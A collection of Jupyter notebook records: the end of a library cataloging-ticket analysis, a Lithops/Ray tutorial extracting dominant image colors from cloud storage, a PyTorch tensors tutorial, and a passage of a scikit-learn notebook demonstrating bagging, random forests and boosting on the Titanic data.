"Barcode sticker request (Research centers only) 2\nBarcodes for circulating materials 5\nCall number error 362\nCall number missing 25\nCataloging Request for a Free Internet Resource 18\nCataloging error 202\nCollection HQ 10\nDamaged material / missing pieces 3\nDuplicate records 1\nElectronic resource 128\nHolds fulfillment--NYPL only 7\nItem attached to wrong bib record 56\nItem not linked 83\nItem record problem 41\nLeased items 2\nLocation code error 11\nOCLC Holdings 6\nOnline Catalog 47\nOther 215\nSpine labels 69\nStatus of request 1\nVolume record needed 4\n"
],
[
"cat_out_df.to_csv('../data-display/cat-active-by-category.csv', index=False)",
"_____no_output_____"
],
[
"\nfor lib, ldf in caadf.groupby('system'):\n lib_out_df = pd.DataFrame(columns=['category', 'tickets'])\n for cat, cdf in ldf.groupby('subcategory'):\n lib_out_df = lib_out_df.append(\n dict(\n category=cat,\n tickets=cdf.shape[0]\n ),\n ignore_index=True)\n \n lib_out_df.to_csv(f'../data-display/{lib}-active-tickets-by-category.csv', index=False)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb51d73d26632ef22b04e2ea72169ac04ca94336 | 4,797 | ipynb | Jupyter Notebook | examples/lithops4ray-color-extraction.ipynb | project-codeflare/data-integration | 9d0b89718d0c4234e52a0d7b384fdb790a64e0ce | [
"Apache-2.0"
] | 4 | 2021-07-12T03:42:17.000Z | 2021-11-25T19:43:01.000Z | examples/lithops4ray-color-extraction.ipynb | project-codeflare/data-integration | 9d0b89718d0c4234e52a0d7b384fdb790a64e0ce | [
"Apache-2.0"
] | null | null | null | examples/lithops4ray-color-extraction.ipynb | project-codeflare/data-integration | 9d0b89718d0c4234e52a0d7b384fdb790a64e0ce | [
"Apache-2.0"
] | null | null | null | 39.319672 | 791 | 0.647488 | [
[
[
"# Color extraction from images with Lithops4Ray\n\nIn this tutorial we explain how to use Lithops4Ray to extract colors and [HSV](https://en.wikipedia.org/wiki/HSL_and_HSV) color range from the images persisted in the IBM Cloud Oject Storage. To experiment with this tutorial, you can use any public image dataset and upload it to your bucket in IBM Cloud Object Storage. For example follow [Stanford Dogs Dataset](http://vision.stanford.edu/aditya86/ImageNetDogs/) to download images. We also provide upload [script](https://github.com/project-codeflare/data-integration/blob/main/scripts/upload_to_ibm_cos.py) that can be used to upload local images to the IBM Cloud Object Storage \n\nOur code is using colorthief package that need to be installed in the Ray cluster, both on head and worker nodes. You can edit `cluster.yaml` file and add\n \n `- pip install colorthief`\n\nTo the `setup_commands` section. This will ensure that once Ray cluster is started required package will be installed automatically.",
"_____no_output_____"
]
],
[
[
"import lithops\nimport ray",
"_____no_output_____"
]
],
[
[
"We write function that extracts color from a single image. Once invoked, Lithops framework will inject a reserved parameter `obj` that points to the data stream of the image. More information on the reserved `obj` parameter can be found [here](https://github.com/lithops-cloud/lithops/blob/master/docs/data_processing.md#processing-data-from-a-cloud-object-storage-service)",
"_____no_output_____"
]
],
[
[
"def extract_color(obj):\n from colorthief import ColorThief\n body = obj.data_stream\n dominant_color = ColorThief(body).get_color(quality=10)\n return dominant_color, obj.key\n",
"_____no_output_____"
]
],
[
[
"We now write a Ray task that will return image name and HSV color range of the image. Instead of a direct call to extract_color function, Lithops is being used behind the scenes (through the data object) to call it only at the right moment.",
"_____no_output_____"
]
],
[
[
"@ray.remote\ndef identify_colorspace(data):\n import colorsys\n color, name = data.result()\n\n hsv = colorsys.rgb_to_hsv(color[0], color[1], color[2])\n val = hsv[0] * 180\n return name, val",
"_____no_output_____"
]
],
[
[
"Now let's tie all together with a main method. By using Lithops allows us to remove all the boiler plate code required to list data from the object storage. It also inspects the data source by using the internal Lithops data partitioner and creates a lazy execution plan, where each entry maps an \"extract_color\" function to a single image. Moreover, Lithops creates a single authentication token that is used by all the tasks, instead of letting each task perform authentication. The parallelism is controlled by Ray and once Ray task is executed, it will call Lithops to execute the extract_color function directly in the context of the calling task. Thus, by using Lithops, we can allow code to access object storage data, without requiring additional coding effort from the user.",
"_____no_output_____"
]
],
[
[
"if __name__ == '__main__':\n\n ray.init(ignore_reinit_error=True)\n\n fexec = lithops.LocalhostExecutor(log_level=None)\n my_data = fexec.map(extract_color, 'cos://<bucket>/<path to images>/')\n\n results = [identify_colorspace.remote(d) for d in my_data]\n\n for res in results:\n value = ray.get(res)\n print(\"Image: \" + value[0] + \", dominant color HSV range: \" + str(value[1]))\n ray.shutdown()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb51f8568a90d2096438b0e336c4d82ab0355a2e | 15,079 | ipynb | Jupyter Notebook | intro-to-pytorch/Part 1 - Tensors in PyTorch (Exercises).ipynb | SiAce/Intro-to-Pytorch | 4745e480449b799468eccd92cb205738e0a21eaa | [
"MIT"
] | 1 | 2020-10-14T02:24:44.000Z | 2020-10-14T02:24:44.000Z | intro-to-pytorch/Part 1 - Tensors in PyTorch (Exercises).ipynb | SiAce/Intro-to-Pytorch | 4745e480449b799468eccd92cb205738e0a21eaa | [
"MIT"
] | 5 | 2020-09-26T00:44:44.000Z | 2022-02-10T01:06:37.000Z | intro-to-pytorch/Part 1 - Tensors in PyTorch (Exercises).ipynb | SiAce/Intro-to-Pytorch | 4745e480449b799468eccd92cb205738e0a21eaa | [
"MIT"
] | null | null | null | 41.770083 | 674 | 0.621129 | [
[
[
"# Introduction to Deep Learning with PyTorch\n\nIn this notebook, you'll get introduced to [PyTorch](http://pytorch.org/), a framework for building and training neural networks. PyTorch in a lot of ways behaves like the arrays you love from Numpy. These Numpy arrays, after all, are just tensors. PyTorch takes these tensors and makes it simple to move them to GPUs for the faster processing needed when training neural networks. It also provides a module that automatically calculates gradients (for backpropagation!) and another module specifically for building neural networks. All together, PyTorch ends up being more coherent with Python and the Numpy/Scipy stack compared to TensorFlow and other frameworks.\n\n",
"_____no_output_____"
],
[
"## Neural Networks\n\nDeep Learning is based on artificial neural networks which have been around in some form since the late 1950s. The networks are built from individual parts approximating neurons, typically called units or simply \"neurons.\" Each unit has some number of weighted inputs. These weighted inputs are summed together (a linear combination) then passed through an activation function to get the unit's output.\n\n<img src=\"assets/simple_neuron.png\" width=400px>\n\nMathematically this looks like: \n\n$$\n\\begin{align}\ny &= f(w_1 x_1 + w_2 x_2 + b) \\\\\ny &= f\\left(\\sum_i w_i x_i +b \\right)\n\\end{align}\n$$\n\nWith vectors this is the dot/inner product of two vectors:\n\n$$\nh = \\begin{bmatrix}\nx_1 \\, x_2 \\cdots x_n\n\\end{bmatrix}\n\\cdot \n\\begin{bmatrix}\n w_1 \\\\\n w_2 \\\\\n \\vdots \\\\\n w_n\n\\end{bmatrix}\n$$",
"_____no_output_____"
],
[
"## Tensors\n\nIt turns out neural network computations are just a bunch of linear algebra operations on *tensors*, a generalization of matrices. A vector is a 1-dimensional tensor, a matrix is a 2-dimensional tensor, an array with three indices is a 3-dimensional tensor (RGB color images for example). The fundamental data structure for neural networks are tensors and PyTorch (as well as pretty much every other deep learning framework) is built around tensors.\n\n<img src=\"assets/tensor_examples.svg\" width=600px>\n\nWith the basics covered, it's time to explore how we can use PyTorch to build a simple neural network.",
"_____no_output_____"
]
],
[
[
"# First, import PyTorch\nimport torch",
"_____no_output_____"
],
[
"def activation(x):\n \"\"\" Sigmoid activation function \n \n Arguments\n ---------\n x: torch.Tensor\n \"\"\"\n return 1/(1+torch.exp(-x))",
"_____no_output_____"
],
[
"### Generate some data\ntorch.manual_seed(7) # Set the random seed so things are predictable\n\n# Features are 5 random normal variables\nfeatures = torch.randn((1, 5))\n# True weights for our data, random normal variables again\nweights = torch.randn_like(features)\n# and a true bias term\nbias = torch.randn((1, 1))",
"_____no_output_____"
]
],
[
[
"Above I generated data we can use to get the output of our simple network. This is all just random for now, going forward we'll start using normal data. Going through each relevant line:\n\n`features = torch.randn((1, 5))` creates a tensor with shape `(1, 5)`, one row and five columns, that contains values randomly distributed according to the normal distribution with a mean of zero and standard deviation of one. \n\n`weights = torch.randn_like(features)` creates another tensor with the same shape as `features`, again containing values from a normal distribution.\n\nFinally, `bias = torch.randn((1, 1))` creates a single value from a normal distribution.\n\nPyTorch tensors can be added, multiplied, subtracted, etc, just like Numpy arrays. In general, you'll use PyTorch tensors pretty much the same way you'd use Numpy arrays. They come with some nice benefits though such as GPU acceleration which we'll get to later. For now, use the generated data to calculate the output of this simple single layer network. \n> **Exercise**: Calculate the output of the network with input features `features`, weights `weights`, and bias `bias`. Similar to Numpy, PyTorch has a [`torch.sum()`](https://pytorch.org/docs/stable/torch.html#torch.sum) function, as well as a `.sum()` method on tensors, for taking sums. Use the function `activation` defined above as the activation function.",
"_____no_output_____"
]
],
[
[
"## Calculate the output of this network using the weights and bias tensors\ny_hat = activation(torch.mm(features, weights.T) + bias)\nprint(y_hat)",
"tensor([[0.1595]])\n"
]
],
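[
[
"For reference, a sketch of the sum-based variant that the exercise hints at; it should produce the same value as the matrix-multiplication solution above, `tensor([[0.1595]])`:\n\n```python\n# Sketch: same single-neuron output computed with an element-wise product and a sum\ny = activation(torch.sum(features * weights) + bias)\nprint(y)\n```",
"_____no_output_____"
]
],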
[
[
"You can do the multiplication and sum in the same operation using a matrix multiplication. In general, you'll want to use matrix multiplications since they are more efficient and accelerated using modern libraries and high-performance computing on GPUs.\n\nHere, we want to do a matrix multiplication of the features and the weights. For this we can use [`torch.mm()`](https://pytorch.org/docs/stable/torch.html#torch.mm) or [`torch.matmul()`](https://pytorch.org/docs/stable/torch.html#torch.matmul) which is somewhat more complicated and supports broadcasting. If we try to do it with `features` and `weights` as they are, we'll get an error\n\n```python\n>> torch.mm(features, weights)\n\n---------------------------------------------------------------------------\nRuntimeError Traceback (most recent call last)\n<ipython-input-13-15d592eb5279> in <module>()\n----> 1 torch.mm(features, weights)\n\nRuntimeError: size mismatch, m1: [1 x 5], m2: [1 x 5] at /Users/soumith/minicondabuild3/conda-bld/pytorch_1524590658547/work/aten/src/TH/generic/THTensorMath.c:2033\n```\n\nAs you're building neural networks in any framework, you'll see this often. Really often. What's happening here is our tensors aren't the correct shapes to perform a matrix multiplication. Remember that for matrix multiplications, the number of columns in the first tensor must equal to the number of rows in the second column. Both `features` and `weights` have the same shape, `(1, 5)`. This means we need to change the shape of `weights` to get the matrix multiplication to work.\n\n**Note:** To see the shape of a tensor called `tensor`, use `tensor.shape`. If you're building neural networks, you'll be using this method often.\n\nThere are a few options here: [`weights.reshape()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.reshape), [`weights.resize_()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.resize_), and [`weights.view()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.view).\n\n* `weights.reshape(a, b)` will return a new tensor with the same data as `weights` with size `(a, b)` sometimes, and sometimes a clone, as in it copies the data to another part of memory.\n* `weights.resize_(a, b)` returns the same tensor with a different shape. However, if the new shape results in fewer elements than the original tensor, some elements will be removed from the tensor (but not from memory). If the new shape results in more elements than the original tensor, new elements will be uninitialized in memory. Here I should note that the underscore at the end of the method denotes that this method is performed **in-place**. Here is a great forum thread to [read more about in-place operations](https://discuss.pytorch.org/t/what-is-in-place-operation/16244) in PyTorch.\n* `weights.view(a, b)` will return a new tensor with the same data as `weights` with size `(a, b)`.\n\nI usually use `.view()`, but any of the three methods will work for this. So, now we can reshape `weights` to have five rows and one column with something like `weights.view(5, 1)`.\n\n> **Exercise**: Calculate the output of our little network using matrix multiplication.",
"_____no_output_____"
]
],
[
[
"## Calculate the output of this network using matrix multiplication",
"_____no_output_____"
]
],
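[
[
"One possible solution sketch (not necessarily the intended one): reshape `weights` with `view` so the shapes line up for `torch.mm`; it should reproduce the `tensor([[0.1595]])` obtained earlier.\n\n```python\n# Sketch: matrix-multiplication version of the single-neuron output\ny = activation(torch.mm(features, weights.view(5, 1)) + bias)\nprint(y)\n```",
"_____no_output_____"
]
],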
[
[
"### Stack them up!\n\nThat's how you can calculate the output for a single neuron. The real power of this algorithm happens when you start stacking these individual units into layers and stacks of layers, into a network of neurons. The output of one layer of neurons becomes the input for the next layer. With multiple input units and output units, we now need to express the weights as a matrix.\n\n<img src='assets/multilayer_diagram_weights.png' width=450px>\n\nThe first layer shown on the bottom here are the inputs, understandably called the **input layer**. The middle layer is called the **hidden layer**, and the final layer (on the right) is the **output layer**. We can express this network mathematically with matrices again and use matrix multiplication to get linear combinations for each unit in one operation. For example, the hidden layer ($h_1$ and $h_2$ here) can be calculated \n\n$$\n\\vec{h} = [h_1 \\, h_2] = \n\\begin{bmatrix}\nx_1 \\, x_2 \\cdots \\, x_n\n\\end{bmatrix}\n\\cdot \n\\begin{bmatrix}\n w_{11} & w_{12} \\\\\n w_{21} &w_{22} \\\\\n \\vdots &\\vdots \\\\\n w_{n1} &w_{n2}\n\\end{bmatrix}\n$$\n\nThe output for this small network is found by treating the hidden layer as inputs for the output unit. The network output is expressed simply\n\n$$\ny = f_2 \\! \\left(\\, f_1 \\! \\left(\\vec{x} \\, \\mathbf{W_1}\\right) \\mathbf{W_2} \\right)\n$$",
"_____no_output_____"
]
],
[
[
"### Generate some data\ntorch.manual_seed(7) # Set the random seed so things are predictable\n\n# Features are 3 random normal variables\nfeatures = torch.randn((1, 3))\n\n# Define the size of each layer in our network\nn_input = features.shape[1] # Number of input units, must match number of input features\nn_hidden = 2 # Number of hidden units \nn_output = 1 # Number of output units\n\n# Weights for inputs to hidden layer\nW1 = torch.randn(n_input, n_hidden)\n# Weights for hidden layer to output layer\nW2 = torch.randn(n_hidden, n_output)\n\n# and bias terms for hidden and output layers\nB1 = torch.randn((1, n_hidden))\nB2 = torch.randn((1, n_output))",
"_____no_output_____"
]
],
[
[
"> **Exercise:** Calculate the output for this multi-layer network using the weights `W1` & `W2`, and the biases, `B1` & `B2`. ",
"_____no_output_____"
]
],
[
[
"## Your solution here\ny_hat = activation(torch.mm(activation(torch.mm(features, W1) + B1), W2) + B2)\nprint(y_hat)",
"tensor([[0.3171]])\n"
]
],
[
[
"If you did this correctly, you should see the output `tensor([[ 0.3171]])`.\n\nThe number of hidden units a parameter of the network, often called a **hyperparameter** to differentiate it from the weights and biases parameters. As you'll see later when we discuss training a neural network, the more hidden units a network has, and the more layers, the better able it is to learn from data and make accurate predictions.",
"_____no_output_____"
],
[
"## Numpy to Torch and back\n\nSpecial bonus section! PyTorch has a great feature for converting between Numpy arrays and Torch tensors. To create a tensor from a Numpy array, use `torch.from_numpy()`. To convert a tensor to a Numpy array, use the `.numpy()` method.",
"_____no_output_____"
]
],
[
[
"import numpy as np\na = np.random.rand(4,3)\na",
"_____no_output_____"
],
[
"b = torch.from_numpy(a)\nb",
"_____no_output_____"
],
[
"b.numpy()",
"_____no_output_____"
]
],
[
[
"The memory is shared between the Numpy array and Torch tensor, so if you change the values in-place of one object, the other will change as well.",
"_____no_output_____"
]
],
[
[
"# Multiply PyTorch Tensor by 2, in place\nb.mul_(2)",
"_____no_output_____"
],
[
"# Numpy array matches new values from Tensor\na",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb51f90f8f0a7b4ee56ad338326a6d5f1c2a0622 | 160,807 | ipynb | Jupyter Notebook | cs455-chapter7-demos.ipynb | richss/cs455-ml-demos | 7b221a44052ffe8061c14c6b6a80a1122d98574c | [
"Apache-2.0"
] | null | null | null | cs455-chapter7-demos.ipynb | richss/cs455-ml-demos | 7b221a44052ffe8061c14c6b6a80a1122d98574c | [
"Apache-2.0"
] | null | null | null | cs455-chapter7-demos.ipynb | richss/cs455-ml-demos | 7b221a44052ffe8061c14c6b6a80a1122d98574c | [
"Apache-2.0"
] | null | null | null | 120.725976 | 19,180 | 0.869633 | [
[
[
"<h1><center>CS 455/595a: Ensemble Methods - bagging and random forests</center></h1>\n<center>Richard S. Stansbury</center>\n\nThis notebook applies the bagging and random forest ensemble classification and regression concepts concepts covered in [1] with the [Titanic](https://www.kaggle.com/c/titanic/) and [Boston Housing](https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_boston.html) data sets for DT-based classification and regression, respectively.\n\nNote: you must install the graphviz package for Python. Please do this install using pip or conda. i.e. \"conda install graphviz\"\n\nReference:\n\n[1] Aurelen Geron. *Hands on Machine Learning with Scikit-Learn & TensorFlow* O'Reilley Media Inc, 2017.\n\n[2] Aurelen Geron. \"ageron/handson-ml: A series of Jupyter notebooks that walk you through the fundamentals of Machine Learning and Deep Learning in python using Scikit-Learn and TensorFlow.\" Github.com, online at: https://github.com/ageron/handson-ml [last accessed 2019-03-01]",
"_____no_output_____"
],
[
"**Table of Contents**\n1. [Titanic Survivor Ensemble Classifiers](#Titanic-Survivor-Classifier)\n \n2. [Boston Housing Cost Ensemble Regressors](#Boston-Housing-Cost-Estimator)",
"_____no_output_____"
],
[
"\n",
"_____no_output_____"
],
[
"# Titanic Survivor Classifier\n\n## Set up - Imports of libraries and Data Preparation",
"_____no_output_____"
]
],
[
[
"from sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import confusion_matrix, precision_score, recall_score, accuracy_score, f1_score \nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn import datasets\n\nfrom matplotlib import pyplot as plt\n%matplotlib inline \n\nimport numpy as np\nimport pandas as pd\nimport os\n\n# Read data from input files into Pandas data frames\ndata_path = os.path.join(\"datasets\",\"titanic\")\ntrain_filename = \"train.csv\"\ntest_filename = \"test.csv\"\n\ndef read_csv(data_path, filename):\n joined_path = os.path.join(data_path, filename)\n return pd.read_csv(joined_path)\n\n# Read CSV file into Pandas Dataframes\ntrain_df = read_csv(data_path, train_filename)\n\n# Defining Data Pre-Processing Pipelines\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n \n def __init__(self, attributes):\n self.attributes = attributes\n \n def fit(self, X, y=None):\n return self\n \n def transform(self, X):\n return X[self.attributes]\n\nclass MostFrequentImputer(BaseEstimator, TransformerMixin):\n \n def fit(self, X, y=None):\n self.most_frequent = pd.Series([X[c].value_counts().index[0] for c in X], \n index = X.columns)\n return self\n \n def transform(self, X):\n return X.fillna(self.most_frequent)\n\n \nnumeric_pipe = Pipeline([\n (\"Select\", DataFrameSelector([\"Age\", \"Fare\", \"SibSp\", \"Parch\"])), # Selects Fields from dataframe\n (\"Imputer\", SimpleImputer(strategy=\"median\")), # Fills in NaN w/ median value for its column\n ])\n\n#Handle categorical string for sex by encoding as female true, 1 or false,0\ntrain_df['Female'] = train_df[\"Sex\"].apply(lambda x: 1 if x == 'female' else 0)\n\ncategories_pipe = Pipeline([\n (\"Select\", DataFrameSelector([\"Pclass\", \"Female\"])), # Selects Fields from dataframe\n (\"MostFreqImp\", MostFrequentImputer()), # Fill in NaN with most frequent\n ])\n\npreprocessing_pipe = FeatureUnion(transformer_list = [\n (\"numeric pipeline\", numeric_pipe), \n (\"categories pipeline\", categories_pipe)\n ]) \n\n# Process Input Data Using Pipleines\ntrain_X_data = preprocessing_pipe.fit_transform(train_df)\n\ntrain_y_data = train_df[\"Survived\"]\n\nfeature_names = [\"Age\", \"Fare\", \"SibSp\", \"Parch\", \"Class\", \"Female\"]\ntarget_names = [\"Died\",\"Survived\"]",
"_____no_output_____"
]
],
[
[
"## KNN Classifier Performance vs. Metrics (for comparison)\n\nThis example is included for comparison by showing the cross validation metric scores for a KNN classifier on the titanic data set.",
"_____no_output_____"
]
],
[
[
"from sklearn.neighbors import KNeighborsClassifier\n\n# KNN Classifier 10-fold Validation\nk=10\nclf = KNeighborsClassifier(n_neighbors=k)\n\ny_pred = cross_val_predict(clf, train_X_data, train_y_data, cv=5)\n\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) \n ",
"Confusion Matrix:\n[[451 98]\n [176 166]]\nAccuracy Score = 0.6924803591470258\nPecision Score = 0.6287878787878788\nRecall Score = 0.4853801169590643\nF1 Score = 0.5478547854785478\n"
]
],
[
[
"## Bagging Example with KNN\n\nThis example implements a bagging classifier of 500 KNN classifiers with K=10. It then demonstrates the performance metrics for the algorithm under a 5-fold cross validation.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import BaggingClassifier\n\nk=2\nbase_clf = KNeighborsClassifier(n_neighbors=k)\n\nbag_clf = BaggingClassifier(\n base_clf,\n n_estimators = 500,\n max_samples=0.5, \n n_jobs = -1,\n bootstrap=True)\n \ny_pred = cross_val_predict(bag_clf, train_X_data, train_y_data, cv=5)\n\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) \n\n",
"Confusion Matrix:\n[[439 110]\n [143 199]]\nAccuracy Score = 0.7160493827160493\nPecision Score = 0.6440129449838188\nRecall Score = 0.5818713450292398\nF1 Score = 0.6113671274961596\n"
]
],
[
[
"## Bagging with Decision Tree\n\nThis example implements a bagging classifier of 500 decision trees (constrained to a maximum depth of 10 each). It then demonstrates the performance metrics for the algorithm under a 5-fold cross validation.",
"_____no_output_____"
]
],
[
[
"from sklearn.tree import DecisionTreeClassifier\n\nbase_clf = DecisionTreeClassifier()\n\nbag_clf = BaggingClassifier(\n base_clf,\n n_estimators = 500,\n max_samples=0.5, \n n_jobs = -1,\n bootstrap=True)\n\n# Crossvalidation with our ensemble classifier\ny_pred = cross_val_predict(bag_clf, train_X_data, train_y_data, cv=5)\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) ",
"Confusion Matrix:\n[[491 58]\n [ 94 248]]\nAccuracy Score = 0.8294051627384961\nPecision Score = 0.8104575163398693\nRecall Score = 0.7251461988304093\nF1 Score = 0.7654320987654322\n"
]
],
[
[
"## Out of Bag Validation\n\nThis examples creates a bagging method ensemble classifier with decision trees up to depth 10. It is configured to output the oob_score, which is the cross validation score. \n",
"_____no_output_____"
]
],
[
[
"from sklearn.tree import DecisionTreeClassifier\n\nk=10\nbase_clf = DecisionTreeClassifier(max_depth=10)\n\nbag_clf = BaggingClassifier(\n base_clf,\n n_estimators = 500,\n max_samples=0.5, \n n_jobs = -1,\n oob_score=True,\n bootstrap=True)\n\nbag_clf.fit(train_X_data, train_y_data)\nbag_clf.oob_score_",
"_____no_output_____"
]
],
[
[
"## Random Forest Example\n\nThis examples creates a random forest of decision tree cassifiers of 500 estimators with a maximum depth limit of 10 for each.\n\nThe output shows the cross validation confusion matrix and the performance metrics.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import RandomForestClassifier\n\nrf_clf = RandomForestClassifier(n_estimators=500, n_jobs=-1, max_depth=10)\n\n# Crossvalidation with our ensemble classifier\ny_pred = cross_val_predict(rf_clf, train_X_data, train_y_data, cv=5)\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) ",
"Confusion Matrix:\n[[490 59]\n [ 98 244]]\nAccuracy Score = 0.8237934904601572\nPecision Score = 0.8052805280528053\nRecall Score = 0.7134502923976608\nF1 Score = 0.7565891472868217\n"
]
],
[
[
"## Feature Importance and Out of Bag Validation for Random Forest\n\nThis example demonstrates a random forest classifier with the oob_score turned to true.\n\nWe output from it the importance score for each feature. We also output the out of bag cross validation score.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import RandomForestClassifier\n\nrf_clf = RandomForestClassifier(n_estimators=500, n_jobs=-1, max_depth=10, oob_score=True)\nrf_clf.fit(train_X_data, train_y_data)\n\nfor name, score in zip(feature_names, rf_clf.feature_importances_):\n print(name, score)\n \nprint(\"\\n\\nOut of Bag Validation:\", rf_clf.oob_score_)",
"Age 0.21721909381306834\nFare 0.2536476612125953\nSibSp 0.054562077510561045\nParch 0.03991794173716475\nClass 0.10807484699497129\nFemale 0.32657837873163925\n\n\nOut of Bag Validation: 0.8249158249158249\n"
]
],
[
[
"## AdaBoost\n\nThis examples creates a Adaboost classifier ensemble of 100 decision trees using the SAMME.R algorithm and a learning rate of 1.0. \n\nThe output shows the cross validation confusion matrix and the performance metrics. Note the similar performance to the previous ensemble, but with lower precision and recall showing that the model is overfitting a bit.",
"_____no_output_____"
]
],
[
[
"# Adaboost goes here\nfrom sklearn.ensemble import AdaBoostClassifier\n\nada_clf = AdaBoostClassifier(\n DecisionTreeClassifier(max_depth=1), n_estimators=100,\n algorithm=\"SAMME.R\", learning_rate=1.0)\n\n# Crossvalidation with our ensemble classifier\ny_pred = cross_val_predict(ada_clf, train_X_data, train_y_data, cv=5)\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) ",
"Confusion Matrix:\n[[466 83]\n [ 88 254]]\nAccuracy Score = 0.8080808080808081\nPecision Score = 0.7537091988130564\nRecall Score = 0.7426900584795322\nF1 Score = 0.748159057437408\n"
]
],
[
[
"## Gradient Boost Decision Tree Classifier\n\nThis examples creates a Gradient Boosting Decision Tree Classifier classifier ensemble of decision trees with max depth=5 and 100 estimators in sequence.\n\nThe output shows the cross validation confusion matrix and the performance metrics.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import GradientBoostingClassifier\n\n\ngb_clf = GradientBoostingClassifier(max_depth=5, n_estimators=100)\n\n# Crossvalidation with our ensemble classifier\ny_pred = cross_val_predict(gb_clf, train_X_data, train_y_data, cv=5)\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) ",
"Confusion Matrix:\n[[492 57]\n [ 99 243]]\nAccuracy Score = 0.8249158249158249\nPecision Score = 0.81\nRecall Score = 0.7105263157894737\nF1 Score = 0.7570093457943925\n"
]
],
[
[
"## Gradient Boost Decision Tree Classifier with Early Stopping\n\nThis examples creates a Gradient Boosting Decision Tree Classifier classifier ensemble of decision trees of max depth = 5 and using early stopping to determine the number of estimators that produced the best results.\n\nThe output shows the cross validation confusion matrix and the performance metrics of a model with the optimal number of estimators.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import GradientBoostingClassifier\n\n# Split the training into a training and validation set\nX_train, X_val, y_train, y_val = train_test_split(train_X_data, train_y_data)\n\nmax_tree_depth=5\n\ngb_clf = GradientBoostingClassifier(max_depth=max_tree_depth, n_estimators=1000)\n\ngb_clf.fit(X_train, y_train)\n\nerrors = [mean_squared_error(y_val, y_pred)\n for y_pred in gb_clf.staged_predict(X_val)]\nbst_n_estimators = np.argmin(errors)\n\nprint(\"Best Number of Estimators:\" + str(bst_n_estimators))\n\ngb_clf = GradientBoostingClassifier(max_depth=max_tree_depth, n_estimators=bst_n_estimators)\n\n# Crossvalidation with our ensemble classifier\ny_pred = cross_val_predict(gb_clf, train_X_data, train_y_data, cv=5)\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) ",
